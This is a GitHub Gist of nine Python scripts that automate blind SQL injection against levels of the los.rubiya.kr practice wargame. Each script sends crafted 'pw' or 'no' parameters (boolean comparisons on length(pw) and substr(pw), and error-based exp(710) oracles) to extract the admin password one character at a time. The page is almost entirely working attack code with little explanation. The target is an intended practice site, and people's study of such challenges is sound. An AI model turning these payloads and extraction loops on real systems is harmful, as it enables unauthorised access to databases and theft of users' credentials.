Last active
January 11, 2021 08:47
-
-
Save Kwonkyu/e8d48dfb2c464dd5f40fa4a660893121 to your computer and use it in GitHub Desktop.
los.rubiya.kr - blind sqli python automation.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| password = '' | |
| password_length = -1 | |
| URL = 'https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php' | |
| headers = {'Content-Type': 'application/json; charset=utf-8'} | |
| cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'} | |
| guest_length = -1 | |
| for estimated_length in range(1, 20): | |
| query = {'pw': '_' * estimated_length} | |
| res=requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if "Hello admin" in res.text: | |
| password_length = estimated_length | |
| print("admin's password length is {}".format(password_length)) | |
| break | |
| elif "Hello guest" in res.text: | |
| guest_length = estimated_length | |
| if guest_length > 0 and password_length < 0: | |
| print("admin's password length is not found. using guest's password length: {}".format(guest_length)) | |
| password_length = guest_length | |
| for current_password_length in range(1, password_length+1) : | |
| guest_character = '' | |
| is_found = False | |
| for password_chr in range(ord('0'),ord('z')+1) : | |
| query={'pw': password + chr(password_chr) + '_' * (password_length - current_password_length)} | |
| res=requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if "Hello admin" in res.text: | |
| password = password+chr(password_chr) | |
| is_found = True | |
| print(password) | |
| break | |
| elif "Hello guest" in res.text: | |
| guest_character = chr(password_chr) | |
| if is_found is False: | |
| password = password + guest_character | |
| print("admin's password character unknown. using guest's password character") | |
| print(password) | |
| if len(password) == password_length: | |
| print("Got it. Password is {} or {}.".format(password.upper(), password.lower())) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| password = '' | |
| password_length = 0 | |
| URL = 'https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php' | |
| headers = {'Content-Type': 'application/json; charset=utf-8'} | |
| cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'} | |
| for estimated_length in range(100): | |
| query={'pw': '1', | |
| 'no': '1||left(id,5)<"admio"&&left(id,5)>"admim"' + '&&length(pw)<' + str(estimated_length)} | |
| res=requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if("Hello admin" in res.text): | |
| password_length = estimated_length - 1 | |
| print("admin's password length is {}".format(password_length)) | |
| break | |
| if password_length < 1: | |
| print("Password length unknown") | |
| exit() | |
| for current_password_length in range(1, password_length+1) : | |
| for password_chr in range(ord('0'),ord('z')+1) : | |
| query={'pw': '1', | |
| 'no': '1||left(id,5)<"admio"&&left(id,5)>"admim"&&right(left(pw,' + \ | |
| str(current_password_length) +'),1)<"' + chr(password_chr) + '"'} | |
| res=requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if("Hello admin" in res.text): | |
| password = password+chr(password_chr - 1) | |
| print(password) | |
| break | |
| if len(password) == password_length: | |
| print("Got it. Password is {} or {}.".format(password.upper(), password.lower())) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| URL='https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php' | |
| params={'pw':''} | |
| cookies={'PHPSESSID':'INSERT_YOUR_COOKIE_HERE'} | |
| password_length = -1 | |
| password = '' | |
| def request_and_response(query): | |
| params['pw']=query | |
| res = requests.get(URL, cookies=cookies, params=params) | |
| if res.text != "": | |
| return True | |
| else: | |
| return False | |
| guess = '0' | |
| for estimated_length in range(20): | |
| guess = "{},{}".format(guess, estimated_length) | |
| query = "' or id='admin' and length(pw) in ({})#".format("{},exp(710)".format(guess)) | |
| if request_and_response(query): | |
| password_length=estimated_length | |
| print("Password length is {}.".format(password_length)) | |
| break | |
| for character_position in range(1, password_length+1): | |
| guess = "'0'" | |
| for estimated_character_ord in range(ord('0'), ord('z')+1): | |
| guess = "{},'{}'".format(guess, chr(estimated_character_ord)) | |
| query = "' or id='admin' and substr(pw,{},1) in ({})#".format(character_position, "{},exp(710)".format(guess)) | |
| if request_and_response(query): | |
| password = password + chr(estimated_character_ord) | |
| print(password) | |
| break | |
| if len(password) == password_length: | |
| print("Got it. Password is {} or {}".format(password.upper(), password.lower()) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| password = '' | |
| password_length = 0 | |
| no = 0 | |
| URL = 'https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php' | |
| headers = {'Content-Type': 'application/json; charset=utf-8'} | |
| cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'} | |
| for estimated_value in range(100): | |
| query={'pw': '1', | |
| 'no': '1 or left(id, 1) < \"b\" and no < ' + str(estimated_value)} | |
| res=requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if("Hello admin" in res.text): | |
| no = estimated_value - 1 | |
| print("admin's no is {}".format(no)) | |
| break | |
| for estimated_length in range(100): | |
| query={'pw': '1', | |
| 'no': '1 or left(id, 1) < \"b\" and no < ' + str(no+1) + \ | |
| ' and length(pw) < ' + str(estimated_length)} | |
| res=requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if("Hello admin" in res.text): | |
| password_length = estimated_length - 1 | |
| print("admin's password length is {}".format(password_length)) | |
| break | |
| if password_length < 1: | |
| print("Password length unknown") | |
| exit() | |
| for current_password_length in range(1, password_length+1) : | |
| for password_chr in range(ord('0'),ord('z')+1) : | |
| query={'pw': '1', | |
| 'no': '1 or left(id, 1) < \"b\" and no < ' + str(no+1) + \ | |
| ' and right(left(pw, ' + str(current_password_length) +'), 1) < \"' + chr(password_chr) + '\"'} | |
| res=requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if("Hello admin" in res.text): | |
| password = password+chr(password_chr - 1) | |
| print(password) | |
| break | |
| if len(password) == password_length: | |
| print("Got it. Password is {} or {}.".format(password.upper(), password.lower())) | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| password='' | |
| password_length = 0 | |
| URL = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php' | |
| headers = {'Content-Type': 'application/json; charset=utf-8'} | |
| cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'} | |
| for estimated_length in range(100): | |
| query={'pw': '\' || substring(id, 1, 1) < \'b\' && length(pw) < ' + str(estimated_length) + '#'} | |
| res=requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if("Hello admin" in res.text): | |
| password_length = estimated_length - 1 | |
| print("admin's password length is {}".format(password_length)) | |
| break | |
| if password_length < 1: | |
| print("Password length unknown") | |
| exit() | |
| for current_password_length in range(1, password_length+1): | |
| for password_chr in range(ord('0'),ord('z')+1) : | |
| query={'pw': '\' || substring(id, 1, 1) < \'b\' && substring(pw,1,' + \ | |
| str(current_password_length) + ') < \'' + password + chr(password_chr).capitalize() + '\'#'} | |
| res=requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if("Hello admin" in res.text): | |
| password = password + chr(password_chr - 1) | |
| print(password) | |
| break | |
| if len(password) == password_length: | |
| print("Got it. Password is {} or {}.".format(password.upper(), password.lower())) | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| URL = 'https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php' | |
| cookies = {'PHPSESSID':'INSERT_YOUR_COOKIE_HERE'} | |
| params = {'pw':''} | |
| password = '' | |
| password_length = -1 | |
| for estimated_password_length in range(100): | |
| params['pw'] = "1' or id='admin' and if(length(pw)={},1,exp(710))#".format(estimated_password_length) | |
| res = requests.get(URL, cookies=cookies, params=params) | |
| print("Trying {}...".format(estimated_password_length)) | |
| if "DOUBLE value is out of range" not in res.text: | |
| password_length = estimated_password_length | |
| break | |
| for character_position in range(password_length+1): | |
| for estimated_character_ord in range(ord('0'), ord('z')+1): | |
| params['pw'] = "1' or id='admin' and if(substr(pw,{},1)='{}',1,exp(710))#".format(character_position, chr(estimated_character_ord)) | |
| res = requests.get(URL, cookies=cookies, params=params) | |
| print("Trying {} at {}...".format(chr(estimated_character_ord), character_position)) | |
| if "DOUBLE value is out of range" not in res.text: | |
| password = password + chr(estimated_character_ord) | |
| print(password) | |
| break | |
| # maybe need to do some binary search! |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| password = '' | |
| password_length = 0 | |
| URL = 'https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php' | |
| headers = {'Content-Type': 'application/json; charset=utf-8'} | |
| cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'} | |
| for estimated_length in range(100): | |
| query={'pw': '\' || id=\'admin\' && length(pw) < '+str(estimated_length)+'#'} | |
| res=requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if("Hello admin" in res.text): | |
| password_length = estimated_length - 1 | |
| print("admin's password length is {}".format(password_length)) | |
| break | |
| if password_length < 1: | |
| print("Password length unknown") | |
| exit() | |
| for current_password_length in range(1, password_length+1) : | |
| for password_chr in range(ord('0'),ord('z')+1) : | |
| query={'pw': '\' || substr(pw,1,'+str(current_password_length)+')=\''+password+chr(password_chr)+'\'#'} | |
| res=requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if("Hello admin" in res.text): | |
| password=password+chr(password_chr) | |
| print(password) | |
| break | |
| if len(password) == password_length: | |
| print("Got it. Password is {} or {}.".format(password.upper(), password.lower())) | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| password = '' | |
| password_length = 0 | |
| URL = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php' | |
| headers = {'Content-Type': 'application/json; charset=utf-8'} | |
| cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'} | |
| for estimated_length in range(100): | |
| query={'pw': '\' || id=\'admin\' && length(pw) < '+str(estimated_length)+'#'} | |
| res=requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if("Hello admin" in res.text): | |
| password_length = estimated_length - 1 | |
| print("admin's password length is {}".format(password_length)) | |
| break | |
| if password_length < 1: | |
| print("Password length unknown") | |
| exit() | |
| for current_password_length in range(1, password_length+1) : | |
| for password_chr in range(ord('0'),ord('z')+1) : | |
| query={'pw': '\' || substr(pw,1,'+str(current_password_length)+')=\''+password+chr(password_chr)+'\'#'} | |
| res=requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if("Hello admin" in res.text): | |
| password=password+chr(password_chr) | |
| print(password) | |
| break | |
| if len(password) == password_length: | |
| print("Got it. Password is {} or {}.".format(password.upper(), password.lower())) | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| password = '' | |
| password_length = -1 | |
| URL = 'https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php' | |
| headers = {'Content-Type': 'application/json; charset=utf-8'} | |
| cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'} | |
| for estimated_length in range(1, 20): | |
| query = {'pw': "' or length(pw)={} and id='admin".format(estimated_length)} | |
| res=requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if "Hello admin" in res.text: | |
| password_length = int(estimated_length / 3) | |
| print("admin's password length is {}(mysql takes hangul for 3).".format(password_length)) | |
| break | |
| for current_password_length in range(1, password_length+1) : | |
| base_password_index = -1 | |
| base_password_limit = -1 | |
| hangul_strings = "가나다라마바사아자차카타파하" | |
| for index, password_chr in enumerate(hangul_strings): | |
| query={'pw': "' or substring(pw,{},1)<'{}' and id='admin".format(current_password_length, password_chr)} | |
| res=requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if "Hello admin" in res.text: | |
| base_password_index = index - 1 | |
| base_password_limit = index | |
| print("Looking for password between {} and {}".\ | |
| format(hangul_strings[base_password_index], hangul_strings[base_password_limit])) | |
| break | |
| if base_password_index < 0: | |
| print("Password character {} is not a word(before '가')".format(current_password_length)) | |
| break | |
| # bug when 'if base_password_index' and base_password_index is 0('가') | |
| if base_password_index >= 0: | |
| for password_ord in range(ord(hangul_strings[base_password_index]), ord(hangul_strings[base_password_limit])): | |
| query = {'pw': "' or substring(pw,{},1)='{}' and id='admin".format(current_password_length, chr(password_ord))} | |
| res = requests.get(URL, params=query, headers=headers, cookies=cookies) | |
| if "Hello admin" in res.text: | |
| password = password + chr(password_ord) | |
| print(password) | |
| break | |
| else: | |
| print("Password at {} not found.".format(current_password_length)) | |
| break | |
| if len(password) == password_length: | |
| print("Got it. Password is {} or {}.".format(password.upper(), password.lower())) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment